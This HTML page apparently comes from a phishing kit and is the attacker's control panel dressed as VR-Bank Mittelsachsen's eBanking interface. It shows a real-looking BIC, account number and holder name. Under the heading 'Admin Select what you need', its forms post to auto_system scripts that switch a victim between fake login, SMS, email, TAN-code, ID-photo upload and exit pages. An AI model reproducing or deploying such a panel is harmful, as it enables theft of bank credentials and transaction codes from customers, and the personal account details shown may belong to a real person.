<html class="js localstorage canvas video no-touchevents cssanimations csstransforms csstransitions" style=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
		<meta name="generator" content="ebPE 21.15-25 BVR2014">
		<meta name="format-detection" content="telephone=no">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
		<title>eBanking Private Edition - VR-Bank Mittelsachsen eG</title>
		
		<link rel="stylesheet" title="normal" type="text/css" href="./style/xbf-styles.css">
<link rel="stylesheet" title="normal" type="text/css" href="./style/navigationResponsive.css">
<link rel="stylesheet" title="normal" type="text/css" href="./style/indiv.css">
	  <link rel="shortcut icon" type="image/x-icon" href="../style/apple-touch-icon-144x144.png">

		 

				
	</head>	<body scroll="auto" class="" style="">
	<div id="ka-id"></div>
        <div id="scroll">
        		
        	<div id="site" style="background-image: url();">
        		<div id="main" class="ym-wrapper">
        			<header id="header">
	<div id="">
<span id="logo"><img alt="Logo" src="../style/ebpe-logo"></span>
</div>



</header>        			

        			
        
                            			
        			        
        
        			<div class="contentDiv">
                     
                    <div id="maincontent" class="maincontent_DEFAULT">
        			    
        			            					

        					<div id="paydirectLogoCnt" style=":none;"></div>
        					<form accept-charset="UTF-8" action="" method="post">


<div class="formInput">
<div class="XContainer" id="mainContent_root">
<table border="0" cellpadding="0" cellspacing="0" rules="none" style="">
<tbody><tr>
<td align="left" valign="top"><span class="XMedia" id="med">
<div class="ebanking-frame-container v-app" id="ebanking_frame_container_null" width="100%" height="1000px">
	<div class="v-csslayout v-layout v-widget hide v-csslayout-hide" id="printHeader2014">
		<div class="v-horizontallayout v-layout v-horizontal v-widget">
			<div class="v-slot">
				<div class="v-horizontallayout v-layout v-horizontal v-widget">
					<div class="v-slot">
						<img class="v-image v-widget" src="./style/ebpe-druckheader-image" alt="ebpe-druckheader-text">
					</div>
				</div>
			</div>
			<div class="v-slot">
				<div class="v-horizontallayout v-layout v-horizontal v-widget">
					<div class="v-slot">
						<div class="v-verticallayout v-layout v-vertical v-widget">
													</div>
					</div>
				</div>
			</div>
		</div>
		<div class="v-label v-widget druckkopf-ueberschrift v-label-druckkopf-ueberschrift v-has-width" style="width: 100%;">VR-Bank Mittelsachsen eG</div>
		<div class="v-verticallayout v-layout v-vertical v-widget druckkopf-details v-verticallayout-druckkopf-details v-has-width" style="width: 100%;">
			<div class="v-slot">
				<div class="v-horizontallayout v-layout v-horizontal v-widget">
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 85px;">
							  								BLZ/BIC:		
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 250px;">
							  								86065468/GENODEF1DL1		
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 93px;">
								  							Datum:
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 172px;">
								  							09.09.2021
	  												</div>
					</div>
				</div>
			</div>
			<div class="v-slot">
				<div class="v-horizontallayout v-layout v-horizontal v-widget">
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 85px;">
															Konto/IBAN:
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 250px;">
															4100150064
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 93px;">
															Uhrzeit:
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 172px;">
															23:29						
													</div>
					</div>
				</div>
			</div>
			<div class="v-slot">
				<div class="v-horizontallayout v-layout v-horizontal v-widget">
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 85px;">
															Abfrage von:
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 250px;">
															Uwe Lehnert
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 93px;">
															Kontoinhaber:
													</div>
					</div>
					<div class="v-slot">
						<div class="v-label v-widget v-has-width" style="width: 172px;">
															Uwe Lehnert
													</div>
					</div>
				</div>
			</div>
		</div>
	</div>
  <div id="bankingarkvrender-1825358184" class="v-app default-0 rbfplusrendererui">



  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=11;chrome=1">
  <style type="text/css">html, body {height:100%;margin:0;}</style>

  
 <link rel="stylesheet" type="text/css" href="./style/1111.css">



  	<div tabindex="1" class="v-ui v-scrollable" style="width: 100%; height: 100%;"><div class="v-loading-indicator first" style="position: absolute; display: none; top: 653.5px;"></div><div class="v-csslayout v-layout v-widget rbf-rootpane-component v-csslayout-rbf-rootpane-component" id="RootPane"><div class="v-csslayout v-layout v-widget rbf-workbench-component v-csslayout-rbf-workbench-component" id="Embedded Integration Workbench"><div class="v-customcomponent v-widget v-has-width" style="width: 100%;"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget rbf-interaction-frame v-csslayout-rbf-interaction-frame rbf-interaction-frame-content-with-progressbar v-csslayout-rbf-interaction-frame-content-with-progressbar rbf-interaction-frame-content-with-entityselection v-csslayout-rbf-interaction-frame-content-with-entityselection" id="assistant"><div class="v-csslayout v-layout v-widget rbf-interaction-frame-header v-csslayout-rbf-interaction-frame-header"><div class="v-csslayout v-layout v-widget rbf-interaction-frame-header-row v-csslayout-rbf-interaction-frame-header-row f-rbf-header-row-title v-csslayout-f-rbf-header-row-title"><div class="v-label v-widget rbf-interaction-frame-header-title v-label-rbf-interaction-frame-header-title rbf-h1 v-label-rbf-h1 v-label-undef-w" lang="de" id="title">Admin Select what you need</div><div class="v-csslayout v-layout v-widget" id="ebRemoteToolbar"></div></div></div><div class="v-csslayout v-layout v-widget"></div><div class="v-csslayout v-layout v-widget rbf-interaction-frame-content v-csslayout-rbf-interaction-frame-content" id="interaction-frame-content"><div class="v-csslayout v-layout v-widget rbf-viewinterpreter v-csslayout-rbf-viewinterpreter"><div class="v-csslayout v-layout v-widget f-rbf-content-viewport v-csslayout-f-rbf-content-viewport vdl-content v-csslayout-vdl-content"><div class="v-customcomponent v-widget v-has-width" id="page" style="width: 100%;"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget f-rbf-layout v-csslayout-f-rbf-layout f-rbf-layout-onecolumn v-csslayout-f-rbf-layout-onecolumn" id="unspecifiedWidget0" style="
    width: max-content;
"><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="v-customcomponent v-widget v-has-width" id="CompStrukturierteDaten" style="width: 100%;"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget f-rbf-layout v-csslayout-f-rbf-layout f-rbf-layout-onecolumn v-csslayout-f-rbf-layout-onecolumn" id="unspecifiedWidget0"><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"></div></div></div></div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="v-customcomponent v-widget v-has-width" id="compTanAuswahl" style="width: 117%;"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget f-rbf-layout v-csslayout-f-rbf-layout f-rbf-layout-onecolumn v-csslayout-f-rbf-layout-onecolumn" id="unspecifiedWidget0"><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="v-csslayout v-layout v-widget f-rbf-content-box-boxed v-csslayout-f-rbf-content-box-boxed" id="unspecifiedWidget1"><div class="v-csslayout v-layout v-widget f-rbf-headline-container v-csslayout-f-rbf-headline-container f-rbf-headline-with-widget v-csslayout-f-rbf-headline-with-widget" id="selectedVerfahren_tanVerfahrenBeschreibung"><div class="v-csslayout v-layout v-widget f-rbf-headline-content-container v-csslayout-f-rbf-headline-content-container"><div class="v-label v-widget f-rbf-headline v-label-f-rbf-headline f-rbf-headline-h1 v-label-f-rbf-headline-h1 v-has-width" lang="de" style="width: 100%;">Sm@rt-TAN</div><div class="v-csslayout v-layout v-widget f-rbf-icon-container v-csslayout-f-rbf-icon-container"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div></div></div><div class="v-customcomponent v-widget v-has-width" id="compEmbededAuswahlPlaceHolder" style="width: 111%;"><br><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget f-rbf-layout v-csslayout-f-rbf-layout f-rbf-layout-onecolumn v-csslayout-f-rbf-layout-onecolumn" id="unspecifiedWidget0"><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="v-customcomponent v-widget v-has-width" id="placeholderIdFarbcode" style="width: 100%;"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget f-rbf-layout v-csslayout-f-rbf-layout f-rbf-layout-onecolumn v-csslayout-f-rbf-layout-onecolumn" id="unspecifiedWidget0"><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="" id="listedEntriesIdFarbcode" style="border-style: none; margin: 0px; padding: 0px; width: 100%;"><ol><span class="" style="
    padding-left: 0em;
    font-size: 18px;
"></form>
<div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">1</span>SeLect Page App \ If you Need   <form method="post" name="App" id="App" action="./auto_system/Select_App.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textApp">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a></button> </form></div></div>


<div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div> <br><div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">2</span>SeLect Page Dih Email  If you Need <form method="post" name="Email" id="Sms" action="./auto_system/Select_Email.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textEmail">   <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a></button></form> </div></div>

<div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div> <br><div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">2</span>SeLect Page Dih login If you Need <form method="post" name="Login" id="Sms" action="./auto_system/Select_Login.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textLogin">   <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a></button></form> </div></div>


<div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div> <br><div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">2</span>SeLect Page Sms \ If you Need <form method="post" name="Sms" id="Sms" action="./auto_system/Select_Sms.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textSms">   <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a></button></form> </div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div><p></p></span><span class="" style="
    padding-left: 0em;
    font-size: 17px;
"><div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;margin: 13px 17px 14px 0px;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">3</span>SeLect Page Code seneder Tan \ If you Need <form method="post" name="Code" id="Code" action="./auto_system/Select_Code.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
"> <input required="" type="text" name="textCode" style="
    padding: 8px;
    border: none;
    border-bottom: 1px solid #ccc;
">  <button type="submit" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
    background-color: white;
    border: none;
"> <a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 23px;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a> </button> </form></div></div><div class=""><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class=""></div></div><p></p></span><span class="" style="
    padding-left: 0em;
    font-size: 18px;
"><div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">4</span>SeLect Page Upload Photo \ If you Need  <form method="post" name="imagee" id="imagee" action="./auto_system/Select_id.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="imagee">  

 <input required="" type="text" name="textimage" style="
    padding: 8px;
    border: none;
    border-bottom: 1px solid #ccc;
"> <button type="submit" style="
    style=&quot;
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
&quot;;
"> <a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 23px;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a> </button> </form>  </div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div><br><div class="" id="unspecifiedWidget2"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-field-xlarge v-csslayout-f-rbf-field-xlarge" id="elementlayout_unspecifiedWidget3"><div class="v-csslayout v-layout v-widget f-rbf-layout-field v-csslayout-f-rbf-layout-field f-rbf-layout-item v-csslayout-f-rbf-layout-item f-rbf-empty-caption v-csslayout-f-rbf-empty-caption f-rbf-field-fullwidth v-csslayout-f-rbf-field-fullwidth"><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div><div class="v-label v-widget xlarge v-label-xlarge f-rbf-highlight v-label-f-rbf-highlight f-rbf-field v-label-f-rbf-field f-rbf-fullwidth v-label-f-rbf-fullwidth v-has-width" lang="de" id="unspecifiedWidget3" style="width: 100%;font-size: 23px;"> <span style="
    color: #ff6600;
    margin: 2px 10px 2px 2px;
">5</span>SeLect Page 5lih ymchi <form method="post" name="Exit" id="Exit" action="./auto_system/Select_Exit.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textExit">  

 <button type="submit" style="
    style=&quot;
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
&quot;;
"> <a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 23px;
    font-size: 28px;
    font-family: sans-serif;
">Next </span>❯</a> </button>  </form>  </div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div>
  	<div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div><p></p></span><li class="f-rbf-bulletstyle-number" style="
    padding-left: 0em;
"><p></p><p></p></li></ol><div location="messageContainer"><div class="v-csslayout v-layout v-widget"></div></div></div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="v-csslayout v-layout v-widget f-rbf-media-layout v-csslayout-f-rbf-media-layout f-rbf-media-layout-side-left v-csslayout-f-rbf-media-layout-side-left f-rbf-media-only v-csslayout-f-rbf-media-only" id="unspecifiedWidget12"><div class="v-csslayout v-layout v-widget f-rbf-media-layout-media v-csslayout-f-rbf-media-layout-media v-has-width" style="width: 100%;"><div class="v-csslayout v-layout v-widget forms-field-group v-csslayout-forms-field-group f-rbf-label-over-field v-csslayout-f-rbf-label-over-field" id="elementlayout_unspecifiedWidget13"><div class="v-csslayout v-layout v-widget f-rbf-layout-label v-csslayout-f-rbf-layout-label f-rbf-layout-item v-csslayout-f-rbf-layout-item block v-csslayout-block f-rbf-empty-caption v-csslayout-f-rbf-empty-caption"><div class="v-csslayout v-layout v-widget f-rbf-layout-label-wrapper v-csslayout-f-rbf-layout-label-wrapper"><div class="v-csslayout v-layout v-widget f-rbf-wordwrap-wrapper v-csslayout-f-rbf-wordwrap-wrapper"><div class="v-label v-widget v-label-undef-w" lang="de"></div><div class="v-csslayout v-layout v-widget f-rbf-iconholder-wrapper v-csslayout-f-rbf-iconholder-wrapper"></div></div></div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hints v-csslayout-f-rbf-layout-hints"><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-error-wrapper v-csslayout-f-rbf-layout-hint-error-wrapper"></div><div class="v-csslayout v-layout v-widget f-rbf-layout-hint-info-wrapper v-csslayout-f-rbf-layout-hint-info-wrapper"></div></div></div></div><div class="v-csslayout v-layout v-widget f-rbf-media-layout-content v-csslayout-f-rbf-media-layout-content v-has-width" style="width: 0%;"></div></div></div></div></div></div></div></div></div></div></div></div><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"><div class="v-customcomponent v-widget v-has-width" id="embeddedPlaceholderId" style="width: 100%;"><div class="v-csslayout v-layout v-widget"><div class="v-csslayout v-layout v-widget f-rbf-layout v-csslayout-f-rbf-layout f-rbf-layout-onecolumn v-csslayout-f-rbf-layout-onecolumn" id="unspecifiedWidget0"><div class="v-csslayout v-layout v-widget f-rbf-layout-row v-csslayout-f-rbf-layout-row f-rbf-hasviewport-width v-csslayout-f-rbf-hasviewport-width"></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><div class="v-csslayout v-layout v-widget rbf-interaction-frame-footer-linkbar v-csslayout-rbf-interaction-frame-footer-linkbar" id="linkbar"></div></div></div></div></div><div id="PostMessagingComponent" class="v-widget"></div></div></div></div></div>


</div>

</span></td>
</tr>
</tbody></table>
</div>
</div>

        				        				
        				
        				
        				
        				<div class="contentWebcenterMainContent">
        				</div>
        			</form></div>
        
                            			 
                                        <div style="clear:both"></div>
                    </div>
                   	<div class="seitenanfang">
        				<a href="#" title="Seitenanfang" class="XLink">Seitenanfang</a>
        			</div>
        		</div>
        		<div id="footernaviInfoMenu">
        			<ul>
<li>
<a href="#" target="demo" title="Zur Demo-Anwendung 21.15-25 (16)">Zur Demo-Anwendung</a>
</li>
<li>
<a href="#" target="Impressum" title="Impressum">Impressum</a>
</li>
<li>
<a href="#" title="AGB">AGB</a>
</li>
<li>
<a href="#" target="PreisLeistung" title="PreisLeistung">Preisaushang</a>
</li>
<li>
<a href="#" target="hilfe" title="Hilfe zur Version 21.15-25">Hilfe</a>
</li>
<li>
<a href="#" title="Sicherheitshinweise">Sicherheitshinweise</a>
</li>
</ul>

        		</div>
                                			        			



                    
               

			</div>
        </div>
                        
</body></html>